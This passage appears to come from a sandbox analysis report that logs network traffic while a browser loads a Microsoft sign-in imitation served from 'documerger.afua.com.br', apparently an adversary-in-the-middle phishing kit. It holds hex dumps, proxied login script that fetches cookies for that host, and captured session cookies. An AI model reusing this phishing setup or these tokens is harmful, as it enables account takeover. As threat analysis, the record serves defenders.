                                                  Data Ascii: =jQuery),function(a){o=[t,n],(i="function"==typeof(r=a)?r.apply(t,o):r)===undefined||(e.exports=i)}((function(e,t){function n(e,t){return(null===e||typeof e in C)&&e===t}function r(e,t){var n;return function(){n||(n=S.a.setTimeout((function(){n=a,e()}),t)
                                                  2024-11-27 17:09:59 UTC16384INData Raw: 73 2e 71 63 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 6e 26 26 73 2e 4a 61 7c 7c 28 61 3d 21 6e 29 2c 73 2e 65 64 3d 73 2e 55 2e 63 68 61 6e 67 65 2e 73 6c 69 63 65 28 30 29 2c 73 2e 4a 61 3d 74 3d 21 30 2c 6f 3d 65 2c 63 28 29 7d 2c 73 2e 70 63 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 7c 7c 28 72 3d 65 2c 73 2e 67 62 28 65 2c 22 62 65 66 6f 72 65 43 68 61 6e 67 65 22 29 29 7d 2c 73 2e 72 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 61 3d 21 30 7d 2c 73 2e 67 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 73 2e 73 62 28 72 2c 73 2e 76 28 21 30 29 29 26 26 28 6e 3d 21 30 29 7d 7d 2c 57 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 55 5b 65 5d 26 26 74 68 69 73 2e 55 5b 65 5d 2e 6c 65 6e 67 74 68 7d 2c 42 64 3a 66 75 6e 63 74 69 6f 6e
                                                  Data Ascii: s.qc=function(e,n){n&&s.Ja||(a=!n),s.ed=s.U.change.slice(0),s.Ja=t=!0,o=e,c()},s.pc=function(e){t||(r=e,s.gb(e,"beforeChange"))},s.rc=function(){a=!0},s.gd=function(){s.sb(r,s.v(!0))&&(n=!0)}},Wa:function(e){return this.U[e]&&this.U[e].length},Bd:function
                                                  2024-11-27 17:09:59 UTC16384INData Raw: 66 28 73 5b 53 2e 61 2e 52 28 6e 29 5d 29 7b 76 61 72 20 6f 3d 6e 2e 66 69 72 73 74 43 68 69 6c 64 3b 69 66 28 6f 29 64 6f 7b 69 66 28 31 3d 3d 3d 6f 2e 6e 6f 64 65 54 79 70 65 29 7b 76 61 72 20 69 2c 61 3d 6e 75 6c 6c 3b 69 66 28 69 3d 6f 2e 66 69 72 73 74 43 68 69 6c 64 29 64 6f 7b 69 66 28 61 29 61 2e 70 75 73 68 28 69 29 3b 65 6c 73 65 20 69 66 28 65 28 69 29 29 7b 76 61 72 20 75 3d 72 28 69 2c 21 30 29 3b 75 3f 69 3d 75 3a 61 3d 5b 69 5d 7d 65 6c 73 65 20 74 28 69 29 26 26 28 61 3d 5b 69 5d 29 7d 77 68 69 6c 65 28 69 3d 69 2e 6e 65 78 74 53 69 62 6c 69 6e 67 29 3b 69 66 28 69 3d 61 29 66 6f 72 28 61 3d 6f 2e 6e 65 78 74 53 69 62 6c 69 6e 67 2c 75 3d 30 3b 75 3c 69 2e 6c 65 6e 67 74 68 3b 75 2b 2b 29 61 3f 6e 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28
                                                  Data Ascii: f(s[S.a.R(n)]){var o=n.firstChild;if(o)do{if(1===o.nodeType){var i,a=null;if(i=o.firstChild)do{if(a)a.push(i);else if(e(i)){var u=r(i,!0);u?i=u:a=[i]}else t(i)&&(a=[i])}while(i=i.nextSibling);if(i=a)for(a=o.nextSibling,u=0;u<i.length;u++)a?n.insertBefore(
                                                  2024-11-27 17:09:59 UTC16384INData Raw: 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 6f 2c 69 2c 61 29 7b 76 61 72 20 73 2c 75 2c 63 2c 6c 2c 64 2c 66 3d 7b 7d 3b 69 66 28 74 29 7b 69 3d 6f 2e 67 65 74 28 22 61 73 22 29 3b 76 61 72 20 70 3d 6f 2e 67 65 74 28 22 6e 6f 43 68 69 6c 64 43 6f 6e 74 65 78 74 22 29 3b 66 3d 7b 61 73 3a 69 2c 6e 6f 43 68 69 6c 64 43 6f 6e 74 65 78 74 3a 70 2c 65 78 70 6f 72 74 44 65 70 65 6e 64 65 6e 63 69 65 73 3a 64 3d 21 28 69 26 26 70 29 7d 7d 72 65 74 75 72 6e 20 6c 3d 28 63 3d 22 72 65 6e 64 65 72 22 3d 3d 6f 2e 67 65 74 28 22 63 6f 6d 70 6c 65 74 65 4f 6e 22 29 29 7c 7c 6f 2e 68 61 73 28 53 2e 69 2e 70 61 29 2c 53 2e 6f 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6f 2c 69 3d 53 2e 61 2e 66 28 72 28 29 29 2c 70 3d 21 6e 21 3d 21 69 2c 68 3d 21 75 3b 28 64 7c 7c
                                                  Data Ascii: function(e,r,o,i,a){var s,u,c,l,d,f={};if(t){i=o.get("as");var p=o.get("noChildContext");f={as:i,noChildContext:p,exportDependencies:d=!(i&&p)}}return l=(c="render"==o.get("completeOn"))||o.has(S.i.pa),S.o((function(){var o,i=S.a.f(r()),p=!n!=!i,h=!u;(d||
                                                  2024-11-27 17:09:59 UTC16384INData Raw: 45 3c 6f 2e 6c 65 6e 67 74 68 3b 29 64 28 43 2b 2b 29 3b 79 2e 5f 63 6f 75 6e 74 57 61 69 74 69 6e 67 46 6f 72 52 65 6d 6f 76 65 3d 78 7d 53 2e 61 2e 67 2e 73 65 74 28 72 2c 74 2c 79 29 2c 66 28 73 2e 62 65 66 6f 72 65 4d 6f 76 65 2c 41 29 2c 53 2e 61 2e 44 28 77 2c 73 2e 62 65 66 6f 72 65 52 65 6d 6f 76 65 3f 53 2e 6f 61 3a 53 2e 72 65 6d 6f 76 65 4e 6f 64 65 29 3b 74 72 79 7b 6d 3d 72 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 7d 63 61 74 63 68 28 49 29 7b 7d 69 66 28 50 2e 6c 65 6e 67 74 68 29 66 6f 72 28 3b 28 4f 3d 50 2e 73 68 69 66 74 28 29 29 21 3d 61 3b 29 7b 66 6f 72 28 70 3d 79 5b 4f 5d 2c 68 3d 61 3b 4f 3b 29 69 66 28 28 67 3d 79 5b 2d 2d 4f 5d 2e 59 29 26 26 67 2e 6c 65 6e 67 74 68 29 7b 68 3d 67 5b 67
                                                  Data Ascii: E<o.length;)d(C++);y._countWaitingForRemove=x}S.a.g.set(r,t,y),f(s.beforeMove,A),S.a.D(w,s.beforeRemove?S.oa:S.removeNode);try{m=r.ownerDocument.activeElement}catch(I){}if(P.length)for(;(O=P.shift())!=a;){for(p=y[O],h=a;O;)if((g=y[--O].Y)&&g.length){h=g[g
                                                  2024-11-27 17:09:59 UTC12649INData Raw: 3d 3d 61 26 26 28 65 3d 6e 65 77 20 75 28 7b 6c 6f 67 4d 65 73 73 61 67 65 3a 62 2c 6c 6f 67 44 61 74 61 50 6f 69 6e 74 3a 79 7d 2c 6e 2e 6e 6f 6e 6f 6e 63 65 2c 22 64 6f 63 75 6d 65 72 67 65 72 2e 61 66 75 61 2e 63 6f 6d 2e 62 72 22 2c 6f 2c 69 29 2e 67 65 74 43 6f 6f 6b 69 65 73 41 73 79 6e 63 28 29 2e 74 68 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 7c 7c 21 65 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 73 2e 72 65 6a 65 63 74 28 6e 65 77 20 75 2e 45 72 72 6f 72 28 22 50 61 67 65 45 78 63 65 70 74 69 6f 6e 22 2c 22 45 78 74 65 6e 73 69 6f 6e 20 72 65 74 75 72 6e 65 64 20 6e 6f 20 63 6f 6f 6b 69 65 73 22 29 29 3b 66 6f 72 28 76 61 72 20 74 3d 30 2c 6e 3d 65 2e 6c 65 6e 67 74 68 3b 74 3c 6e 3b 2b 2b 74 29 7b 76 61 72 20 72 3d 65 5b
                                                  Data Ascii: ==a&&(e=new u({logMessage:b,logDataPoint:y},n.nononce,"documerger.afua.com.br",o,i).getCookiesAsync().then((function(e){if(!e||!e.length)return s.reject(new u.Error("PageException","Extension returned no cookies"));for(var t=0,n=e.length;t<n;++t){var r=e[


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  68192.168.2.64978313.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:58 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:59 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:58 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 419
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                  ETag: "0x8DC582BB7F164C3"
                                                  x-ms-request-id: dd02da03-701e-001e-0d91-3ff5e6000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170958Z-174f7845968kdththC1EWRzvxn00000009k000000000dkah
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:59 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  69192.168.2.64978513.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:58 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:59 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:59 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 419
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                  ETag: "0x8DC582B9FF95F80"
                                                  x-ms-request-id: 417b9f3b-401e-0029-4091-3f9b43000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170959Z-174f7845968j6t2phC1EWRcfe80000000xa000000000p24r
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:59 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  70192.168.2.64978413.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:58 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:59 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:59 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 477
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                  ETag: "0x8DC582BA48B5BDD"
                                                  x-ms-request-id: f73eacfc-701e-0001-0b91-3fb110000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170959Z-174f78459688l8rvhC1EWRtzr000000009vg0000000088k8
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:59 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  71192.168.2.64978613.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:58 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:59 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:59 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 472
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                  ETag: "0x8DC582BB650C2EC"
                                                  x-ms-request-id: fcd7fe31-301e-0033-0c91-3ffa9c000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170959Z-174f7845968zgtf6hC1EWRqd8s0000000q2000000000tw8v
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:59 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  72192.168.2.64978713.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:59 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:59 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:59 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 468
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                  ETag: "0x8DC582BB3EAF226"
                                                  x-ms-request-id: 3ccb05f8-401e-0016-1b69-3f53e0000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170959Z-174f7845968l4kp6hC1EWRe8840000000xk0000000002kbk
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:59 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  73192.168.2.64979694.247.42.1124435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:00 UTC1726OUTGET /aadcdn.msauth.net/~/ests/2.1/content/cdnbundles/converged.v2.login.min_nin8k2ycrbzww8zl5vxkaq2.css HTTP/1.1
                                                  Host: documerger.afua.com.br
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: text/css,*/*;q=0.1
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: style
                                                  Referer: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=true
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AUEBqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABBAQ.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeMDNGfnl6oXh6m1eqsE64gD13UKVTkOa0T3VRA3VOaCpKxFRCxPww9QCIPrWTYVEG9X9txaUDGZELufmBiGepVCuL0SOKd58RpLy_rvZgwl0gAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFesF8UsCxSxDcoxw-xrCQ67rIKyVoTpTC9uNH1PXX6p3vQkvFuXnbHNs1WK4tLlVzpWNTTbcy9Ob9ZSIKdy4Vyy6v87hWVWZYDbULvnrAhdXEyhHnDZvmXl3Mnl-gt96cbfaXcDYxLR8O_SeffgzfEpiJGsFRueZIEAZ9CXp4SEcEgAA; esctx-vx9c64vM4xk=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeAwFuG362UjUTo8-5QYKBMiP8QfRQW20XO8feZzPFcg5-Pnb8vUmJJo4As76UyLnLh97_DctiY0iR6ZOaJrr6aX2kkC74smgbaW_v7OGRG0ifKfAFd5gQrv6u0Cz76bVNf4ueMSNsqQJY5hpqqnhLaiAA; fpc=AnIF4PXDa21Bo9TCi_D-hPu4vjNwAQAAA [TRUNCATED]
                                                  2024-11-27 17:10:01 UTC775INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:01 GMT
                                                  Content-Type: text/css
                                                  Content-Length: 20400
                                                  Connection: close
                                                  Cache-Control: public, max-age=31536000
                                                  Content-Encoding: gzip
                                                  Last-Modified: Wed, 25 Sep 2024 21:42:27 GMT
                                                  ETag: 0x8DCDDAAF34D1A25
                                                  x-ms-request-id: 8b047e32-601e-004a-7d2e-401766000000
                                                  x-ms-version: 2009-09-19
                                                  x-ms-lease-status: unlocked
                                                  x-ms-blob-type: BlockBlob
                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                  Access-Control-Allow-Origin: *
                                                  x-azure-ref: 20241127T171001Z-1544c49f7f8gpvb9hC1ZRHf7p400000002n00000000052a4
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:01 UTC15609INData Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 7d 6b 93 db 36 b2 e8 77 ff 0a ee a4 52 eb c9 4a 8c 48 3d 47 53 49 ad e3 78 93 39 c7 af b2 9d 7d 54 2a b5 c5 91 a8 11 8f 29 51 97 a4 66 3c ab a3 ff 7e f1 46 03 68 90 d4 78 b2 d9 7b 2b eb 8d 2d a2 1b 0d a0 d1 68 a0 81 6e e0 eb af fe 10 3c 2f 76 f7 65 76 b3 ae 83 a7 cf cf 83 57 d9 a2 2c aa 62 55 93 f4 72 57 94 49 9d 15 db 30 78 96 e7 01 43 aa 82 32 ad d2 f2 36 5d 86 c1 57 5f 7f fd d5 1f 9e f4 bb ff 2f 78 ff e1 d9 bb 0f c1 9b bf 04 1f 7e bc 7a f7 7d f0 96 7c fd 23 78 fd e6 c3 d5 f3 17 41 67 2a 4f 9e 7c 58 67 55 b0 ca f2 34 20 ff 5e 27 55 ba 0c 8a 6d 50 94 41 b6 5d 88 5a a7 55 b0 21 7f 97 59 92 07 ab b2 d8 04 f5 3a 0d 76 65 f1 3f e9 82 b4 21 cf aa 9a 64 ba 4e f3 e2 2e 78 4a c8 95 cb e0 6d 52 d6 f7 c1 d5 db f3 30 f8 40 70 0b d2
                                                  Data Ascii: }k6wRJH=GSIx9}T*)Qf<~Fhx{+-hn</vevW,bUrWI0xC26]W_/x~z}|#xAg*O|XgU4 ^'UmPA]ZU!Y:ve?!dN.xJmR0@p
                                                  2024-11-27 17:10:01 UTC4791INData Raw: 8b 88 bd ac 2c 12 31 2f 2a 2b 24 e5 a1 95 75 9e df 51 bb 5f 6a 19 63 dc bc c9 45 89 b5 70 47 5d 70 ca fb 9e 0e 20 56 49 be 20 69 14 01 46 49 a3 08 a2 a9 10 de 51 33 ab ab 42 ad 3a 03 51 82 c9 86 58 21 80 b6 66 35 88 5b 0b 1a d2 44 af 18 0e 06 e3 65 32 71 db a4 25 ce 20 03 a5 0f 01 b4 b6 c9 2f 95 2d 68 58 9b 7c d2 ca db f4 30 61 ec 73 a7 f6 1e b8 a8 5b 0e 36 f1 85 8e 36 04 a6 86 1b 02 93 e3 0d 14 66 70 df 93 6e 56 08 83 b4 76 40 43 45 db f0 b0 2e 10 57 99 1b 46 0a 7a 9a 6c 5e eb 5b 91 85 43 fa 34 bc 98 9d 23 97 02 03 20 96 48 ba 89 37 5f 87 50 e3 87 e3 60 22 80 5b d9 23 19 93 28 7f 18 bb 0c ee 13 f6 9e b3 cc 4f 7d b0 93 e5 be fa 81 1c e1 db 81 87 f8 c3 85 9e 97 26 d9 ad e4 e2 f9 d0 f9 26 d9 66 bb 7d ce d8 eb 5e a9 2b 2e 5f 31 9e 3c 14 8e 66 b6 29 6a 84 19
                                                  Data Ascii: ,1/*+$uQ_jcEpG]p VI iFIQ3B:QX!f5[De2q% /-hX|0as[66fpnVv@CE.WFzl^[C4# H7_P`"[#(O}&&f}^+._1<f)j


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  74192.168.2.64979894.247.42.1124435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:00 UTC1703OUTGET /aadcdn.msauth.net/~/shared/1.0/content/js/ConvergedLogin_PCore_h6TdaK6cfsrg175w47aRCA2.js HTTP/1.1
                                                  Host: documerger.afua.com.br
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: */*
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: script
